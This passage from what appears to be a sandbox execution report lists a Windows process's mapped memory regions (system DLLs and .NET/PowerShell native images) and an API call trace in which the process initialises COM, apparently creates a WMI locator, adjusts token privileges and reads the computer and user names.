	          end_va = 0x7ffb9628ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96280000"
	        filename = ""

Region:
	              id = 1453
	        start_va = 0x7ffb96290000
	          end_va = 0x7ffb9629ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96290000"
	        filename = ""

Region:
	              id = 1454
	        start_va = 0x7ffb962a0000
	          end_va = 0x7ffb962affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962a0000"
	        filename = ""

Region:
	              id = 1455
	        start_va = 0x233e3f20000
	          end_va = 0x233e3f24fff
	     entry_point = 0x233e3f20000
	     region_type = mapped_file
	            name = "winnlsres.dll"
	        filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")

Region:
	              id = 1456
	        start_va = 0x233e3f30000
	          end_va = 0x233e3f3ffff
	     entry_point = 0x233e3f30000
	     region_type = mapped_file
	            name = "winnlsres.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")

Region:
	              id = 1457
	        start_va = 0x5cc80000
	          end_va = 0x5ccc8fff
	     entry_point = 0x5cc80000
	     region_type = mapped_file
	            name = "system.transactions.dll"
	        filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll")

Region:
	              id = 1458
	        start_va = 0x233fc620000
	          end_va = 0x233fc620fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc620000"
	        filename = ""

Region:
	              id = 1459
	        start_va = 0x7ffbf1650000
	          end_va = 0x7ffbf1734fff
	     entry_point = 0x7ffbf1650000
	     region_type = mapped_file
	            name = "system.transactions.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\1a0039f0915836d939d771d7abc21893\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\1a0039f0915836d939d771d7abc21893\\system.transactions.ni.dll")

Region:
	              id = 1460
	        start_va = 0x7ffbf1740000
	          end_va = 0x7ffbf17e8fff
	     entry_point = 0x7ffbf1740000
	     region_type = mapped_file
	            name = "microsoft.wsman.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\5a3b55817db1f9d796b9b41c9ab92853\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\5a3b55817db1f9d796b9b41c9ab92853\\microsoft.wsman.management.ni.dll")

Region:
	              id = 1461
	        start_va = 0x7ffbf17f0000
	          end_va = 0x7ffbf1822fff
	     entry_point = 0x7ffbf17f0000
	     region_type = mapped_file
	            name = "system.configuration.install.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\e48b746caae6f9959e8f0bcd6a0bd5b2\\system.configuration.install.ni.dll")

Region:
	              id = 1462
	        start_va = 0x7ffbf1830000
	          end_va = 0x7ffbf1898fff
	     entry_point = 0x7ffbf1830000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.diagnostics.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\bb0e04744a248fac351d492d487895da\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\bb0e04744a248fac351d492d487895da\\microsoft.powershell.commands.diagnostics.ni.dll")

Region:
	              id = 1463
	        start_va = 0x7ffbf18a0000
	          end_va = 0x7ffbf1bcffff
	     entry_point = 0x7ffbf18a0000
	     region_type = mapped_file
	            name = "system.core.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\6bb5037e396ab8fd052e7b3a2c1a9c84\\system.core.ni.dll")

Region:
	              id = 1464
	        start_va = 0x233fc630000
	          end_va = 0x233fc82ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc630000"
	        filename = ""

Region:
	              id = 1465
	        start_va = 0x7ffbf11b0000
	          end_va = 0x7ffbf11b6fff
	     entry_point = 0x7ffbf11b0000
	     region_type = mapped_file
	            name = "shfolder.dll"
	        filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")

Region:
	              id = 1466
	        start_va = 0x7ffbf11c0000
	          end_va = 0x7ffbf11fdfff
	     entry_point = 0x7ffbf11c0000
	     region_type = mapped_file
	            name = "microsoft.powershell.security.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\40c9953e749f0757ce67ecbdfe12f613\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\40c9953e749f0757ce67ecbdfe12f613\\microsoft.powershell.security.ni.dll")

Region:
	              id = 1467
	        start_va = 0x7ffbf1200000
	          end_va = 0x7ffbf124bfff
	     entry_point = 0x7ffbf1200000
	     region_type = mapped_file
	            name = "system.serviceprocess.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.ServiceProce#\\4e4b553cb8528abca787c6e0821e2a0f\\System.ServiceProcess.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.serviceproce#\\4e4b553cb8528abca787c6e0821e2a0f\\system.serviceprocess.ni.dll")

Region:
	              id = 1468
	        start_va = 0x7ffbf1250000
	          end_va = 0x7ffbf1367fff
	     entry_point = 0x7ffbf1250000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.management.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\e89252939b60e0b094732d516aabfb1f\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\e89252939b60e0b094732d516aabfb1f\\microsoft.powershell.commands.management.ni.dll")

Region:
	              id = 1469
	        start_va = 0x7ffbf1370000
	          end_va = 0x7ffbf1421fff
	     entry_point = 0x7ffbf1370000
	     region_type = mapped_file
	            name = "microsoft.powershell.consolehost.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\807cdbb97f8470d00364b0e411435df1\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\807cdbb97f8470d00364b0e411435df1\\microsoft.powershell.consolehost.ni.dll")

Region:
	              id = 1470
	        start_va = 0x7ffbf1430000
	          end_va = 0x7ffbf1645fff
	     entry_point = 0x7ffbf1430000
	     region_type = mapped_file
	            name = "microsoft.powershell.commands.utility.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\59eeb33edb7dc0fa61bcbf137101bd4c\\microsoft.powershell.commands.utility.ni.dll")

Region:
	              id = 1471
	        start_va = 0x7ffc07fd0000
	          end_va = 0x7ffc07fdbfff
	     entry_point = 0x7ffc07fd0000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")

Region:
	              id = 1472
	        start_va = 0x233e14b0000
	          end_va = 0x233e14c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e14b0000"
	        filename = ""

Region:
	              id = 1473
	        start_va = 0x233e14e0000
	          end_va = 0x233e14effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14e0000"
	        filename = ""

Region:
	              id = 1474
	        start_va = 0x233fc830000
	          end_va = 0x233fc83ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc830000"
	        filename = ""

Region:
	              id = 1475
	        start_va = 0x7ffb962b0000
	          end_va = 0x7ffb962bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962b0000"
	        filename = ""

Region:
	              id = 1476
	        start_va = 0x7ffb962c0000
	          end_va = 0x7ffb962cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962c0000"
	        filename = ""

Region:
	              id = 1477
	        start_va = 0x7ffb962d0000
	          end_va = 0x7ffb962dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962d0000"
	        filename = ""

Region:
	              id = 1478
	        start_va = 0x7ffb962e0000
	          end_va = 0x7ffb962effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962e0000"
	        filename = ""

Region:
	              id = 1479
	        start_va = 0x3501010000
	          end_va = 0x350199ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003501010000"
	        filename = ""

Region:
	              id = 1480
	        start_va = 0x7ffbf6590000
	          end_va = 0x7ffbf66d6fff
	     entry_point = 0x7ffbf6590000
	     region_type = mapped_file
	            name = "system.configuration.ni.dll"
	        filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\d150bbe1b49ee54e3c69b476754f88b9\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\d150bbe1b49ee54e3c69b476754f88b9\\system.configuration.ni.dll")

Region:
	              id = 1481
	        start_va = 0x233fc840000
	          end_va = 0x233fc85ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc840000"
	        filename = ""

Region:
	              id = 1482
	        start_va = 0x7ffb962f0000
	          end_va = 0x7ffb962fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb962f0000"
	        filename = ""

Region:
	              id = 1483
	        start_va = 0x7ffbf10f0000
	          end_va = 0x7ffbf11a9fff
	     entry_point = 0x7ffbf10f0000
	     region_type = mapped_file
	            name = "rasapi32.dll"
	        filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")

Region:
	              id = 1484
	        start_va = 0x7ffbf6940000
	          end_va = 0x7ffbf6967fff
	     entry_point = 0x7ffbf6940000
	     region_type = mapped_file
	            name = "rasman.dll"
	        filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")

Region:
	              id = 1485
	        start_va = 0x7ffc0cc10000
	          end_va = 0x7ffc0cc23fff
	     entry_point = 0x7ffc0cc10000
	     region_type = mapped_file
	            name = "rtutils.dll"
	        filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")

Region:
	              id = 1486
	        start_va = 0x35019a0000
	          end_va = 0x3501a1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000035019a0000"
	        filename = ""

Region:
	              id = 1487
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 1488
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 1489
	        start_va = 0x3501a20000
	          end_va = 0x3501a9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003501a20000"
	        filename = ""

Region:
	              id = 1490
	        start_va = 0x233fc860000
	          end_va = 0x233fc862fff
	     entry_point = 0x233fc860000
	     region_type = mapped_file
	            name = "security.dll"
	        filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll")

Region:
	              id = 1491
	        start_va = 0x7ffc12a20000
	          end_va = 0x7ffc12a43fff
	     entry_point = 0x7ffc12a20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 1492
	        start_va = 0x7ffc03c60000
	          end_va = 0x7ffc03c8efff
	     entry_point = 0x7ffc03c60000
	     region_type = mapped_file
	            name = "cryptnet.dll"
	        filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")

Region:
	              id = 1493
	        start_va = 0x3501aa0000
	          end_va = 0x3501b1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000003501aa0000"
	        filename = ""

Region:
	              id = 1494
	        start_va = 0x7ffc03f90000
	          end_va = 0x7ffc0400ffff
	     entry_point = 0x7ffc03f90000
	     region_type = mapped_file
	            name = "webio.dll"
	        filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")

Region:
	              id = 1495
	        start_va = 0x233e14a0000
	          end_va = 0x233e14a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233e14a0000"
	        filename = ""

Region:
	              id = 1496
	        start_va = 0x7ffbf6920000
	          end_va = 0x7ffbf693efff
	     entry_point = 0x7ffbf6920000
	     region_type = mapped_file
	            name = "shfusion.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\shfusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusion.dll")

Region:
	              id = 1497
	        start_va = 0x7ffbf76c0000
	          end_va = 0x7ffbf7769fff
	     entry_point = 0x7ffbf76c0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll")

Region:
	              id = 1498
	        start_va = 0x233e14e0000
	          end_va = 0x233e14e6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233e14e0000"
	        filename = ""

Region:
	              id = 1499
	        start_va = 0x233fc830000
	          end_va = 0x233fc830fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc830000"
	        filename = ""

Region:
	              id = 1500
	        start_va = 0x233fc9b0000
	          end_va = 0x233fc9bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc9b0000"
	        filename = ""

Region:
	              id = 1501
	        start_va = 0x7ffbf6910000
	          end_va = 0x7ffbf6916fff
	     entry_point = 0x7ffbf6910000
	     region_type = mapped_file
	            name = "fusion.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\fusion.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\fusion.dll")

Region:
	              id = 1502
	        start_va = 0x233fc870000
	          end_va = 0x233fc870fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc870000"
	        filename = ""

Region:
	              id = 1503
	        start_va = 0x7ffbf6900000
	          end_va = 0x7ffbf6909fff
	     entry_point = 0x7ffbf6900000
	     region_type = mapped_file
	            name = "culture.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")

Region:
	              id = 1504
	        start_va = 0x233fc880000
	          end_va = 0x233fc880fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc880000"
	        filename = ""

Region:
	              id = 1505
	        start_va = 0x7ffbf6570000
	          end_va = 0x7ffbf6588fff
	     entry_point = 0x7ffbf6570000
	     region_type = mapped_file
	            name = "shfusres.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ShFusRes.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\shfusres.dll")

Region:
	              id = 1506
	        start_va = 0x233fc890000
	          end_va = 0x233fc890fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc890000"
	        filename = ""

Region:
	              id = 1507
	        start_va = 0x233fc8a0000
	          end_va = 0x233fc8e3fff
	     entry_point = 0x233fc8a0000
	     region_type = mapped_file
	            name = "system.security.dll"
	        filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll")

Region:
	              id = 1508
	        start_va = 0x233fc8f0000
	          end_va = 0x233fc933fff
	     entry_point = 0x233fc8f0000
	     region_type = mapped_file
	            name = "system.security.dll"
	        filename = "\\Windows\\assembly\\GAC_MSIL\\System.Security\\2.0.0.0__b03f5f7f11d50a3a\\System.Security.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.security\\2.0.0.0__b03f5f7f11d50a3a\\system.security.dll")

Region:
	              id = 1509
	        start_va = 0x233fc940000
	          end_va = 0x233fc94ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc940000"
	        filename = ""

Region:
	              id = 1510
	        start_va = 0x7ffb96300000
	          end_va = 0x7ffb9630ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96300000"
	        filename = ""

Region:
	              id = 1511
	        start_va = 0x7ffb96310000
	          end_va = 0x7ffb9631ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffb96310000"
	        filename = ""

Region:
	              id = 1512
	        start_va = 0x7ffbf68f0000
	          end_va = 0x7ffbf68fcfff
	     entry_point = 0x7ffbf68f0000
	     region_type = mapped_file
	            name = "wminet_utils.dll"
	        filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\wminet_utils.dll")

Region:
	              id = 1513
	        start_va = 0x233fc950000
	          end_va = 0x233fc950fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000233fc950000"
	        filename = ""

Region:
	              id = 1514
	        start_va = 0x233fc960000
	          end_va = 0x233fc966fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc960000"
	        filename = ""

Region:
	              id = 1515
	        start_va = 0x233fc970000
	          end_va = 0x233fc97ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc970000"
	        filename = ""

Region:
	              id = 1516
	        start_va = 0x233fc980000
	          end_va = 0x233fc98ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc980000"
	        filename = ""

Region:
	              id = 1517
	        start_va = 0x233fc990000
	          end_va = 0x233fc99ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc990000"
	        filename = ""

Region:
	              id = 1518
	        start_va = 0x233fc9a0000
	          end_va = 0x233fc9affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc9a0000"
	        filename = ""

Region:
	              id = 1519
	        start_va = 0x233fc980000
	          end_va = 0x233fc98ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000233fc980000"
	        filename = ""

Region:
	              id = 1520
	        start_va = 0x7ffc06ac0000
	          end_va = 0x7ffc06ad5fff
	     entry_point = 0x7ffc06ac0000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")

Region:
	              id = 1521
	        start_va = 0x7ffc06ae0000
	          end_va = 0x7ffc06af9fff
	     entry_point = 0x7ffc06ae0000
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")

Region:
	              id = 1522
	        start_va = 0x7ffc0ff80000
	          end_va = 0x7ffc0ff97fff
	     entry_point = 0x7ffc0ff80000
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")

Region:
	              id = 1523
	        start_va = 0x7ffc06b00000
	          end_va = 0x7ffc06b0cfff
	     entry_point = 0x7ffc06b00000
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")


Thread:
	id = 39
	os_tid = 0xdf0

	[0049.198] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff66e670000
	[0049.198] __set_app_type (_Type=0x1) 
	[0049.198] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff66e6b1aa0) returned 0x0
	[0049.198] __wgetmainargs (in: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268, _DoWildCard=0, _StartInfo=0x7ff66e6da274 | out: _Argc=0x7ff66e6da258, _Argv=0x7ff66e6da260, _Env=0x7ff66e6da268) returned 0
	[0049.200] ??0CHString@@QEAA@XZ () returned 0x7ff66e6da9b0
	[0049.201] ??0CHString@@QEAA@XZ () returned 0x7ff66e6dae60
	[0049.202] ?Empty@CHString@@QEAAXXZ () returned 0x7ffbfe19627c
	[0049.202] SetConsoleCtrlHandler (HandlerRoutine=0x7ff66e6aa570, Add=1) returned 1
	[0049.202] _onexit (_Func=0x7ff66e6bcd20) returned 0x7ff66e6bcd20
	[0049.202] _onexit (_Func=0x7ff66e6bce30) returned 0x7ff66e6bce30
	[0049.202] _onexit (_Func=0x7ff66e6bce70) returned 0x7ff66e6bce70
	[0049.202] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0049.202] ResolveDelayLoadedAPI () returned 0x7ffc16032c50
	[0049.202] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0049.618] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0049.628] CoCreateInstance (in: rclsid=0x7ff66e6c3568*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c3578*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x7ff66e6da840 | out: ppv=0x7ff66e6da840*=0x233e12241d0) returned 0x0
	[0049.642] GetCurrentProcess () returned 0xffffffffffffffff
	[0049.642] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x350027f6c0 | out: TokenHandle=0x350027f6c0*=0x13c) returned 1
	[0049.643] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x350027f6b8 | out: TokenInformation=0x0, ReturnLength=0x350027f6b8) returned 0
	[0049.643] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x3, TokenInformation=0x233e14f5d80, TokenInformationLength=0x40, ReturnLength=0x350027f6b8 | out: TokenInformation=0x233e14f5d80, ReturnLength=0x350027f6b8) returned 1
	[0049.643] AdjustTokenPrivileges (in: TokenHandle=0x13c, DisableAllPrivileges=0, NewState=0x233e14f5d80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x42002e, Luid.HighPart=1370819342, Attributes=0x75e0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0049.643] CloseHandle (hObject=0x13c) returned 1
	[0049.645] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0049.646] _vsnwprintf (in: _Buffer=0x233e14f5e20, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x350027f3c8 | out: _Buffer="ms_409") returned 6
	[0049.647] GetComputerNameW (in: lpBuffer=0x233e14f5e70, nSize=0x350027f6c8 | out: lpBuffer="X2VS1CUM", nSize=0x350027f6c8) returned 1
	[0049.647] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.647] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.647] ResolveDelayLoadedAPI () returned 0x7ffc136a3fa0
	[0049.647] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x350027f6c0 | out: lpNameBuffer=0x0, nSize=0x350027f6c0) returned 0x3500014000
	[0049.648] GetLastError () returned 0xea
	[0049.648] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e14f5ec0, nSize=0x350027f6c0 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027f6c0) returned 0x1
	[0049.648] lstrlenW (lpString="") returned 0
	[0049.648] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.648] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="", cchCount2=0) returned 3
	[0049.650] lstrlenW (lpString=".") returned 1
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2=".", cchCount2=1) returned 3
	[0049.650] lstrlenW (lpString="LOCALHOST") returned 9
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="LOCALHOST", cchCount2=9) returned 3
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="X2VS1CUM", cchCount1=8, lpString2="X2VS1CUM", cchCount2=8) returned 2
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] lstrlenW (lpString="X2VS1CUM") returned 8
	[0049.650] ResolveDelayLoadedAPI () returned 0x7ffc16fc09f0
	[0049.652] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0049.652] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0049.652] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0049.652] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0049.653] SysStringLen (param_1="IMPERSONATE") returned 0xb
	[0049.653] SysStringLen (param_1="DELEGATE") returned 0x8
	[0049.653] SysStringLen (param_1="IDENTIFY") returned 0x8
	[0049.653] SysStringLen (param_1="DELEGATE") returned 0x8
	[0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0049.653] SysStringLen (param_1="ANONYMOUS") returned 0x9
	[0049.653] SysStringLen (param_1="DELEGATE") returned 0x8
	[0049.653] SysStringLen (param_1="NONE") returned 0x4
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="NONE") returned 0x4
	[0049.653] SysStringLen (param_1="CONNECT") returned 0x7
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="CALL") returned 0x4
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="CALL") returned 0x4
	[0049.653] SysStringLen (param_1="CONNECT") returned 0x7
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="NONE") returned 0x4
	[0049.653] SysStringLen (param_1="NONE") returned 0x4
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
